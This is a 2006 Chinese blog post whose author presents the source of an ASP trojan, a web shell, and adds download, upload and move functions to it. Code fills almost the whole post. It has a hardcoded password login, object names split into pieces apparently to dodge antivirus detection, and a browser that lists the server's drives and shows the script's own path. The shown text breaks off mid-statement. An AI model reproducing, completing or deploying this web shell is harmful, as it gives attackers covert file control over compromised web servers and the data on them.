ASP木马的功能补充 - icecool的博客

作者在 2006-06-12 16:52:00 发布以下内容

前面写过一个ASP木马雏形,加上了下载功能,上传功能,移动功能:

<%
response.write"<CENTER>"
fpath=Request.Querystring("fpath")
ac=Request.Querystring("ac")
URL=Request.ServerVariables("URL")
webfolder=server.mappath("\test.asp")
action2=Request("Action2")
action=Request.Querystring("action")
pws=request("pws")
'在此处修改登录密码,修改下面的asdf为你的密码
pass="asdf"

if Session("icecoolpws")<>pass then
   if pws = "" then
   logine()
   end if
end if

sub logine()
response.write"<br><br><br><form method='POST' action='"&url&"?action=login'>"
response.write"输入密码:<input type='password' size='20' name='pws'>"
response.write"<input type='submit' name='submit' value='进入'>"
response.write"</form>"
response.end
end sub
function log()
if pws=pass then
   session("icecoolpws")=pws
   response.redirect url
else
   response.write"<br><br><br>登录失败!<br>"
   response.write"<a href='"&url&"'>重新登录</A>"
   response.end
end if
end function

Dim ObT(13,2)
dim T1
ObT(4,0) = "Scrip"&DEfd&"ting"&DEfd&".D"&DEfd&"icti"&DEfd&"onary"
ObT(6,0) = "Ado"&DEfd&"d"&DEfd&"b"&DEfd&".S"&DEfd&"tre"&DEfd&"am"

select case action
   case "copyfolder"
         copyfolder()
   case "movefolder"
         movefolder()
   case "creatfol"
         creatform()
   case "upfile"
         uploadfile()
   case ""
         fileoperation
   case "login"
         log
end select

function fileoperation

if fpath = "" then
fpath = "C:\"
end if

'显示服务器上的所有驱动器和类型
response.write "<table width='700' height='15' border='1' cellpadding='0' cellspacing='0' style='border-collapse:collapse'>"

    response.write"<font size=2>服务器上驱动器:</font>"
   Dim fsodri, d, dc, dri, n
   Set fsodri = CreateObject("Scripting.FileSystemObject")
   Set dc = fsodri.Drives
   For Each d in dc
        n = ""
        dri = d.DriveLetter & ":"
     If d.DriveType = 3 Then'如果为网络影射盘
        response.write "<A href='"&url&"?fpath=" & dri&"\ '>" & dri & "(netdriver)</a>   "
     else
        if d.DriveType = 4 Then'如果为光驱
           response.write "<A href='"&url&"?fpath=" & dri&"\ '>" & dri & "(CD-ROM)</a>   "
         ElseIf d.IsReady Then
            response.write "<A href='"&url&"?fpath=" & dri&"\ '>" & dri &"</a>   "
        end if
      End If
   Next

'显示当前路径和本文件的绝对路径
response.write"<br><br><font size=2>本文件的绝对路径:</font><font size=2 color=#ff0000>"
response.write server.mappath(Request.ServerVariables("SCRIPT_NAME")) & "</font>"
response.wri